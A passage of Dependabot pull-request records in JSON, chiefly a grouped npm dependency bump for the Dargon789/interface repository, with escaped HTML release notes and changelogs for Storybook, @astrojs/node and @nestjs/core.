\u003ccode\u003eember-template-compiler\u003c/code\u003e import for ember 6+ - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30682\"\u003e#30682\u003c/a\u003e, thanks \u003ca href=\"https://github.com/leoeuclids\"\u003e\u003ccode\u003e@​leoeuclids\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eNext: Update vite-plugin-storybook-nextjs to 2.0.0--canary.33.17a2310.0 - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30997\"\u003e#30997\u003c/a\u003e, thanks \u003ca href=\"https://github.com/kasperpeulen\"\u003e\u003ccode\u003e@​kasperpeulen\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eSvelte: Exclude \u003ccode\u003enode_modules\u003c/code\u003e from docgen - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30981\"\u003e#30981\u003c/a\u003e, thanks \u003ca href=\"https://github.com/JReinhold\"\u003e\u003ccode\u003e@​JReinhold\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.6.11\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAngular: Fix zone.js support for Angular libraries - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30941\"\u003e#30941\u003c/a\u003e, thanks \u003ca href=\"https://github.com/valentinpalkovic\"\u003e\u003ccode\u003e@​valentinpalkovic\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.6.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAddon-docs: Fix non-string handling in Stories block - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30913\"\u003e#30913\u003c/a\u003e, thanks \u003ca href=\"https://github.com/JamesIves\"\u003e\u003ccode\u003e@​JamesIves\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eNextjs: Fix styled-jsx optimize vite warnings - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30932\"\u003e#30932\u003c/a\u003e, thanks \u003ca href=\"https://github.com/kasperpeulen\"\u003e\u003ccode\u003e@​kasperpeulen\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eReact: Fix actImplementation is not a function - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30929\"\u003e#30929\u003c/a\u003e, thanks \u003ca href=\"https://github.com/kasperpeulen\"\u003e\u003ccode\u003e@​kasperpeulen\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.6.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNext: Fix react aliases in next vite plugin - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30914\"\u003e#30914\u003c/a\u003e, thanks \u003ca href=\"https://github.com/kasperpeulen\"\u003e\u003ccode\u003e@​kasperpeulen\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.6.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAngular: Export all files in Angular package.json - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30849\"\u003e#30849\u003c/a\u003e, thanks \u003ca href=\"https://github.com/kasperpeulen\"\u003e\u003ccode\u003e@​kasperpeulen\u003c/code\u003e\u003c/a\u003e!\u003c/li\u003e\n\u003cli\u003eCLI: Don't add packageManager entry to package.json automatically - \u003ca href=\"https://redirect.github.com/storybookjs/storybook/pull/30855\"\u003e#30855\u003c/a\u003e, thank...\n\n_Description has been truncated_","html_url":"https://github.com/Dargon789/interface/pull/142","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dargon789%2Finterface/issues/142","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/142/packages"},{"uuid":"4535285153","node_id":"PR_kwDORYvafs7f-IIi","number":2,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 1 directory with 28 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-29T23:08:18.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-27T19:51:37.000Z","updated_at":"2026-05-29T23:08:20.000Z","time_to_close":184601,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":28,"packages":[{"name":"@astrojs/node","old_version":"9.5.4","new_version":"10.0.5","repository_url":"https://github.com/withastro/astro"},{"name":"@nestjs/core","old_version":"11.1.8","new_version":"11.1.18","repository_url":"https://github.com/nestjs/nest"},{"name":"@nestjs/microservices","old_version":"11.1.8","new_version":"11.1.19","repository_url":"https://github.com/nestjs/nest"},{"name":"astro","old_version":"5.17.3","new_version":"6.1.10","repository_url":"https://github.com/withastro/astro"},{"name":"axios","old_version":"1.13.5","new_version":"1.15.2","repository_url":"https://github.com/axios/axios"},{"name":"nodemailer","old_version":"7.0.11","new_version":"8.0.5","repository_url":"https://github.com/nodemailer/nodemailer"},{"name":"uuid","old_version":"11.1.0","new_version":"14.0.0","repository_url":"https://github.com/uuidjs/uuid"},{"name":"yaml","old_version":"2.8.1","new_version":"2.8.3","repository_url":"https://github.com/eemeli/yaml"},{"name":"postcss","old_version":"8.4.38","new_version":"8.5.10","repository_url":"https://github.com/postcss/postcss"},{"name":"vite","old_version":"7.1.12","new_version":"7.3.2","repository_url":"https://github.com/vitejs/vite"},{"name":"@babel/plugin-transform-modules-systemjs","old_version":"7.27.1","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"basic-ftp","old_version":"5.0.5","new_version":"5.3.1","repository_url":"https://github.com/patrickjuchli/basic-ftp"},{"name":"brace-expansion","old_version":"1.1.12","new_version":"1.1.15","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"fast-uri","old_version":"3.1.0","new_version":"3.1.2","repository_url":"https://github.com/fastify/fast-uri"},{"name":"flatted","old_version":"3.3.3","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"follow-redirects","old_version":"1.15.11","new_version":"1.16.0","repository_url":"https://github.com/follow-redirects/follow-redirects"},{"name":"ip-address","old_version":"10.0.1","new_version":"10.2.0","repository_url":"https://github.com/beaugunderson/ip-address"},{"name":"node-forge","old_version":"1.3.2","new_version":"1.4.0","repository_url":"https://github.com/digitalbazaar/forge"},{"name":"picomatch","old_version":"2.3.1","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"protobufjs","old_version":"7.5.4","new_version":"7.6.1","repository_url":"https://github.com/protobufjs/protobuf.js"},{"name":"smol-toml","old_version":"1.6.0","new_version":"1.6.1","repository_url":"https://github.com/squirrelchat/smol-toml"},{"name":"socket.io-parser","old_version":"4.2.4","new_version":"4.2.6","repository_url":"https://github.com/socketio/socket.io"},{"name":"tmp","old_version":"0.2.5","new_version":"0.2.7","repository_url":"https://github.com/raszi/node-tmp"},{"name":"webpack-dev-server","old_version":"5.2.2","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 24 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [@astrojs/node](https://github.com/withastro/astro/tree/HEAD/packages/integrations/node) | `9.5.4` | `10.0.5` |\n| [@nestjs/core](https://github.com/nestjs/nest/tree/HEAD/packages/core) | `11.1.8` | `11.1.18` |\n| [@nestjs/microservices](https://github.com/nestjs/nest/tree/HEAD/packages/microservices) | `11.1.8` | `11.1.19` |\n| [astro](https://github.com/withastro/astro/tree/HEAD/packages/astro) | `5.17.3` | `6.1.10` |\n| [axios](https://github.com/axios/axios) | `1.13.5` | `1.15.2` |\n| [nodemailer](https://github.com/nodemailer/nodemailer) | `7.0.11` | `8.0.5` |\n| [uuid](https://github.com/uuidjs/uuid) | `11.1.0` | `14.0.0` |\n| [yaml](https://github.com/eemeli/yaml) | `2.8.1` | `2.8.3` |\n| [postcss](https://github.com/postcss/postcss) | `8.4.38` | `8.5.10` |\n| [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite) | `7.1.12` | `7.3.2` |\n| [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs) | `7.27.1` | `7.29.7` |\n| [basic-ftp](https://github.com/patrickjuchli/basic-ftp) | `5.0.5` | `5.3.1` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.12` | `1.1.15` |\n| [fast-uri](https://github.com/fastify/fast-uri) | `3.1.0` | `3.1.2` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.3.3` | `3.4.2` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.11` | `1.16.0` |\n| [ip-address](https://github.com/beaugunderson/ip-address) | `10.0.1` | `10.2.0` |\n| [node-forge](https://github.com/digitalbazaar/forge) | `1.3.2` | `1.4.0` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n| [protobufjs](https://github.com/protobufjs/protobuf.js) | `7.5.4` | `7.6.1` |\n| [smol-toml](https://github.com/squirrelchat/smol-toml) | `1.6.0` | `1.6.1` |\n| [socket.io-parser](https://github.com/socketio/socket.io) | `4.2.4` | `4.2.6` |\n| [tmp](https://github.com/raszi/node-tmp) | `0.2.5` | `0.2.7` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.2` | `5.2.4` |\n\n\nUpdates `@astrojs/node` from 9.5.4 to 10.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/withastro/astro/releases\"\u003e@​astrojs/node's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003e@​astrojs/node\u003c/code\u003e\u003ca href=\"https://github.com/10\"\u003e\u003ccode\u003e@​10\u003c/code\u003e\u003c/a\u003e.0.5\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16319\"\u003e#16319\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/940afd53040a14e924606b3218a8619c1e2674ee\"\u003e\u003ccode\u003e940afd5\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Fixes static asset error responses incorrectly including immutable cache headers. Conditional request failures (e.g. \u003ccode\u003eIf-Match\u003c/code\u003e mismatch) now return the correct status code without far-future cache directives.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/withastro/astro/blob/main/packages/integrations/node/CHANGELOG.md\"\u003e@​astrojs/node's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.0.5\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16319\"\u003e#16319\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/940afd53040a14e924606b3218a8619c1e2674ee\"\u003e\u003ccode\u003e940afd5\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Fixes static asset error responses incorrectly including immutable cache headers. Conditional request failures (e.g. \u003ccode\u003eIf-Match\u003c/code\u003e mismatch) now return the correct status code without far-future cache directives.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.0.4\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16002\"\u003e#16002\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/846f27f4be8508f728d237e93fcac7c6ec8227b2\"\u003e\u003ccode\u003e846f27f\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/buley\"\u003e\u003ccode\u003e@​buley\u003c/code\u003e\u003c/a\u003e! - Fixes file descriptor leaks from read streams that were not destroyed on client disconnect or read errors\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/15941\"\u003e#15941\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/f41584ad8af1d9edfa22153fb65005b2e9529d73\"\u003e\u003ccode\u003ef41584a\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/ematipico\"\u003e\u003ccode\u003e@​ematipico\u003c/code\u003e\u003c/a\u003e! - Fixes an infinite loop in \u003ccode\u003eresolveClientDir()\u003c/code\u003e when the server entry point is bundled with esbuild or similar tools. The function now throws a descriptive error instead of hanging indefinitely when the expected server directory segment is not found in the file path.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.0.3\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/15735\"\u003e#15735\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/9685e2d5ef132ca113144c1714163511a93fd29e\"\u003e\u003ccode\u003e9685e2d\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/fa-sharp\"\u003e\u003ccode\u003e@​fa-sharp\u003c/code\u003e\u003c/a\u003e! - Fixes an EventEmitter memory leak when serving static pages from Node.js middleware.\u003c/p\u003e\n\u003cp\u003eWhen using the middleware handler, requests that were being passed on to Express / Fastify (e.g. static files / pre-rendered pages / etc.) weren't cleaning up socket listeners before calling \u003ccode\u003enext()\u003c/code\u003e, causing a memory leak warning. This fix makes sure to run the cleanup before calling \u003ccode\u003enext()\u003c/code\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.0.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/15934\"\u003e#15934\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/6f8f0bc4e22e958ccc2164acb1aa8cce21c43148\"\u003e\u003ccode\u003e6f8f0bc\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/ematipico\"\u003e\u003ccode\u003e@​ematipico\u003c/code\u003e\u003c/a\u003e! - Updates the Astro \u003ccode\u003epeerDependencies#astro\u003c/code\u003e to be \u003ccode\u003e6.0.0\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.0.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/15868\"\u003e#15868\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/bb2b8f5cd3c9f3140b4bb0fb5a1d4c62b41883b8\"\u003e\u003ccode\u003ebb2b8f5\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/ematipico\"\u003e\u003ccode\u003e@​ematipico\u003c/code\u003e\u003c/a\u003e! - Fixes an issue where the adapter would cause a series of warnings during the build.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.0.0\u003c/h2\u003e\n\u003ch3\u003eMajor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/15654\"\u003e#15654\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/a32aee6eb8bb9ae46caf2249ff56df27db2d4e2a\"\u003e\u003ccode\u003ea32aee6\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/florian-lefebvre\"\u003e\u003ccode\u003e@​florian-lefebvre\u003c/code\u003e\u003c/a\u003e! - Removes the \u003ccode\u003eexperimentalErrorPageHost\u003c/code\u003e option\u003c/p\u003e\n\u003cp\u003eThis option allowed fetching a prerendered error page from a different host than the server is currently running on.\u003c/p\u003e\n\u003cp\u003eHowever, there can be security implications with prefetching from other hosts, and often more customization was required to do this safely. This has now been removed as a built-in option so that you can implement your own secure solution as needed and appropriate for your project via middleware.\u003c/p\u003e\n\u003ch4\u003eWhat should I do?\u003c/h4\u003e\n\u003cp\u003eIf you were previously using this feature, you must remove the option from your adapter configuration as it no longer exists:\u003c/p\u003e\n\u003cpre lang=\"diff\"\u003e\u003ccode\u003e// astro.config.mjs\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/eca29c17853b16fe2d05d1ecc7629b85bd30bfc2\"\u003e\u003ccode\u003eeca29c1\u003c/code\u003e\u003c/a\u003e [ci] release (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/16314\"\u003e#16314\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/940afd53040a14e924606b3218a8619c1e2674ee\"\u003e\u003ccode\u003e940afd5\u003c/code\u003e\u003c/a\u003e Fix static asset error responses including immutable cache headers (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/16319\"\u003e#16319\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/fab9c005403e4c807e469461556385bea1a44840\"\u003e\u003ccode\u003efab9c00\u003c/code\u003e\u003c/a\u003e chore: upgrade biome (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/16246\"\u003e#16246\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/711f837cfa3374a458f1f91e08bc388e7c0e12e6\"\u003e\u003ccode\u003e711f837\u003c/code\u003e\u003c/a\u003e Prevent static assets from being caught by catch-all routes (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/16047\"\u003e#16047\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/88fcc98e58455167afa0233163680b833812b69d\"\u003e\u003ccode\u003e88fcc98\u003c/code\u003e\u003c/a\u003e fix integrations links across docs (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/16098\"\u003e#16098\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/4a6ff2a40f5aaa844afc5ac2710b129e1d6ca7d5\"\u003e\u003ccode\u003e4a6ff2a\u003c/code\u003e\u003c/a\u003e [ci] release (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/16020\"\u003e#16020\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/b9e96da0fd6bef9230f9fe60887e99cdfb561dd7\"\u003e\u003ccode\u003eb9e96da\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency vitest to v4 (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/15372\"\u003e#15372\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/846f27f4be8508f728d237e93fcac7c6ec8227b2\"\u003e\u003ccode\u003e846f27f\u003c/code\u003e\u003c/a\u003e fix: destroy read streams to prevent file descriptor leaks (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/16002\"\u003e#16002\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/f41584ad8af1d9edfa22153fb65005b2e9529d73\"\u003e\u003ccode\u003ef41584a\u003c/code\u003e\u003c/a\u003e fix(node): recursion fs loop (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/15941\"\u003e#15941\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/withastro/astro/commit/878791fa7d5a8fb515e21e4ceec7693dbfe2e037\"\u003e\u003ccode\u003e878791f\u003c/code\u003e\u003c/a\u003e [ci] release (\u003ca href=\"https://github.com/withastro/astro/tree/HEAD/packages/integrations/node/issues/15985\"\u003e#15985\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/withastro/astro/commits/@astrojs/node@10.0.5/packages/integrations/node\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@nestjs/core` from 11.1.8 to 11.1.18\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nestjs/nest/releases\"\u003e@​nestjs/core's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev11.1.18 (2026-04-03)\u003c/h2\u003e\n\u003ch4\u003eBug fixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003emicroservices\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16675\"\u003e#16675\u003c/a\u003e fix(microservices): preserve packet headers in nats serializer (\u003ca href=\"https://github.com/wwenrr\"\u003e\u003ccode\u003e@​wwenrr\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ecore\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16683\"\u003e#16683\u003c/a\u003e fix(core): prevent injector hang when design:paramtypes is missing (\u003ca href=\"https://github.com/Youmoo\"\u003e\u003ccode\u003e@​Youmoo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16637\"\u003e#16637\u003c/a\u003e fix(core): dependency injection edge case with moduleref.create (\u003ca href=\"https://github.com/JakobStaudinger\"\u003e\u003ccode\u003e@​JakobStaudinger\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16686\"\u003enestjs/nest#16686\u003c/a\u003e fix(core): sanitize sse message\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDependencies\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ecore\u003c/code\u003e, \u003ccode\u003eplatform-express\u003c/code\u003e, \u003ccode\u003eplatform-fastify\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16679\"\u003e#16679\u003c/a\u003e fix(deps): update dependency path-to-regexp to v8.4.2 (\u003ca href=\"https://github.com/apps/renovate\"\u003e\u003ccode\u003e@​renovate[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eplatform-fastify\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16623\"\u003e#16623\u003c/a\u003e fix(deps): update dependency fastify to v5.8.4 (\u003ca href=\"https://github.com/apps/renovate\"\u003e\u003ccode\u003e@​renovate[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eplatform-ws\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16618\"\u003e#16618\u003c/a\u003e chore(deps): bump ws from 8.19.0 to 8.20.0 (\u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ecommon\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16619\"\u003e#16619\u003c/a\u003e chore(deps): bump file-type from 21.3.3 to 21.3.4 (\u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 6\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAnkit San (\u003ca href=\"https://github.com/ankitbelal\"\u003e\u003ccode\u003e@​ankitbelal\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eJakob Staudinger (\u003ca href=\"https://github.com/JakobStaudinger\"\u003e\u003ccode\u003e@​JakobStaudinger\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eKamil Mysliwiec (\u003ca href=\"https://github.com/kamilmysliwiec\"\u003e\u003ccode\u003e@​kamilmysliwiec\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eKrishna Chaitanya (\u003ca href=\"https://github.com/Krishnachaitanyakc\"\u003e\u003ccode\u003e@​Krishnachaitanyakc\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMK (\u003ca href=\"https://github.com/wwenrr\"\u003e\u003ccode\u003e@​wwenrr\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eyoumoo (\u003ca href=\"https://github.com/Youmoo\"\u003e\u003ccode\u003e@​Youmoo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev11.1.17 (2026-03-16)\u003c/h2\u003e\n\u003ch4\u003eEnhancements\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003emicroservices\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16218\"\u003e#16218\u003c/a\u003e feat(microservices): add redis driver identification (\u003ca href=\"https://github.com/vchomakov\"\u003e\u003ccode\u003e@​vchomakov\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eBugs\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eplatform-fastify\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eauto-run middleware for HEAD requests as fastify redirects them to GET handlers (effectively skipping middleware execution) \u003ca href=\"https://github.com/nestjs/nest/commit/cbdf737cd6e7cefa52d05ecea2ae4af95c464614\"\u003ehttps://github.com/nestjs/nest/commit/cbdf737cd6e7cefa52d05ecea2ae4af95c464614\u003c/a\u003e (\u003ca href=\"https://github.com/kamilmysliwiec\"\u003e\u003ccode\u003e@​kamilmysliwiec\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDependencies\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ecommon\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16567\"\u003e#16567\u003c/a\u003e fix(deps): update dependency file-type to v21.3.2 (\u003ca href=\"https://github.com/apps/renovate\"\u003e\u003ccode\u003e@​renovate[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eplatform-fastify\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16533\"\u003e#16533\u003c/a\u003e fix(deps): update dependency fastify to v5.8.2 (\u003ca href=\"https://github.com/apps/renovate\"\u003e\u003ccode\u003e@​renovate[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eRohan Santhosh Kumar (\u003ca href=\"https://github.com/Rohan5commit\"\u003e\u003ccode\u003e@​Rohan5commit\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eVasil Chomakov (\u003ca href=\"https://github.com/vchomakov\"\u003e\u003ccode\u003e@​vchomakov\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eKamil Mysliwiec 